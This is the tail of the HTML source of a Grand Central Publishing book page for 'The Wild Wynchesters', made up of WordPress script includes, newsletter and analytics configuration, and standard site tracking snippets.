<script type='text/javascript' src='https://www.grandcentralpublishing.com/wp-includes/js/dist/hooks.min.js?ver=c6d64f2cb8f5c6bb49caca37f8828ce3' id='wp-hooks-js'></script>
<script type='text/javascript' src='https://www.grandcentralpublishing.com/wp-includes/js/dist/i18n.min.js?ver=ebee46757c6a411e38fd079a7ac71d94' id='wp-i18n-js'></script>
<script type='text/javascript' id='wp-i18n-js-after'>
wp.i18n.setLocaleData( { 'text direction\u0004ltr': [ 'ltr' ] } );
</script>
<script type='text/javascript' src='https://www.grandcentralpublishing.com/wp-includes/js/dist/a11y.min.js?ver=a38319d7ba46c6e60f7f9d4c371222c5' id='wp-a11y-js'></script>
<script type='text/javascript' id='jquery-ui-autocomplete-js-extra'>
/* <![CDATA[ */
var uiAutocompleteL10n = {"noResults":"No results found.","oneResult":"1 result found. Use up and down arrow keys to navigate.","manyResults":"%d results found. Use up and down arrow keys to navigate.","itemSelected":"Item selected."};
/* ]]> */
</script>
<script type='text/javascript' src='https://www.grandcentralpublishing.com/wp-includes/js/jquery/ui/autocomplete.min.js?ver=1.13.1' id='jquery-ui-autocomplete-js'></script>
<script type='text/javascript' src='https://www.grandcentralpublishing.com/wp-content/themes/hachette/static/js/common.bundle.min.js?ver=82a0e38301f5aa8cd2b6' id='hachette-common-js-js'></script>
<script type='text/javascript' src='https://www.grandcentralpublishing.com/wp-includes/js/hoverIntent.min.js?ver=1.10.2' id='hoverIntent-js'></script>
<script type='text/javascript' id='hachette-site-js-js-extra'>
/* <![CDATA[ */
var newsletter = {"ajax_url":"https:\/\/www.grandcentralpublishing.com\/wp-admin\/admin-ajax.php","nonce":"648278348b","duplicate":"Success! You're signed up.","success":"Success! You're signed up.","invalid":"Hm, try another email?","error":"We're sorry, there was an error."};
var mailchimpPopup = {"ajax_url":"https:\/\/www.grandcentralpublishing.com\/wp-admin\/admin-ajax.php","nonce":"37b8e5412e","success":"Your preferences have been successfully saved.","error":"We're sorry, there was an error."};
var whatsInside = {"ajaxUrl":"\/wp-admin\/admin-ajax.php?action=zola_preview&zola-auth=6c9225e924"};
var lazyTitles = {"ajaxUrl":"\/wp-admin\/admin-ajax.php?action=lazy_title&load-title-auth=5c42e7937e"};
var icons = {"contributor":"https:\/\/www.grandcentralpublishing.com\/wp-content\/themes\/hachette\/static\/images\/icons\/contributor.png","hbg-title":"https:\/\/www.grandcentralpublishing.com\/wp-content\/themes\/hachette\/static\/images\/icons\/hbg-title.png"};
var geoCountryCode = "US";
var euroUser = "false";
var gdprForAll = "false";
var analytics = {"environAuth":"EVafa-1EU0ArWEPW1vxdeQ","environPreview":"env-24","dataLayer":"dataLayer","containerKey":"GTM-5LRFFXK"};
/* ]]> */
</script>
<script type='text/javascript' src='https://www.grandcentralpublishing.com/wp-content/themes/hachette/static/js/hachette-site.bundle.min.js?ver=82a0e38301f5aa8cd2b6' id='hachette-site-js-js'></script>
<script type='text/javascript' id='hbg-all-domains-js-js-extra'>
/* <![CDATA[ */
var checkExam = {"ajaxUrl":"https:\/\/www.grandcentralpublishing.com\/wp-admin\/admin-ajax.php","nonce":"d24ec908a6","isbns":["The Wild Wynchesters"],"button":".zb-btn","link":"exam-copy-link","zola_url":"https:\/\/examcopyrequestform.poweredbyzola.com\/?isbn="};
/* ]]> */
</script>
<script type='text/javascript' src='https://www.grandcentralpublishing.com/wp-content/themes/hachette-book-group/client/build/js/lens-hbg-all-domains.bundle.js?ver=bb4252242b73f07ad540' id='hbg-all-domains-js-js'></script>
<script type='text/javascript' src='https://platform.twitter.com/widgets.js?ver=1.0' id='hbg-twitter-widget-js'></script>
<script type='text/javascript' src='https://www.grandcentralpublishing.com/wp-content/themes/hachette-book-group/client/build/js/lens-grand-central-publishing.bundle.js?ver=bb4252242b73f07ad540' id='hachette-lens-js-js'></script>
<script src='https://stats.wp.com/e-202222.js' defer></script>
<script>
	_stq = window._stq || [];
	_stq.push([ 'view', {v:'ext',j:'1:10.9',blog:'155679224',post:'1223196',tz:'-4',srv:'www.grandcentralpublishing.com',hp:'vip'} ]);
	_stq.push([ 'clickTrackerInit', '155679224', '1223196' ]);
</script>
	<script type="text/javascript">window.NREUM||(NREUM={});NREUM.info={"beacon":"bam.nr-data.net","licenseKey":"658e85a11b","applicationID":"129129957","transactionName":"NVZRZhMHDUVVVUMKCgwcclEVDwxYG0FFAhUSVkE=","queueTime":0,"applicationTime":301,"atts":"GRFGEFsdHhoWVxVZHh9O","errorBeacon":"bam.nr-data.net","agent":""}</script></body>
</html>

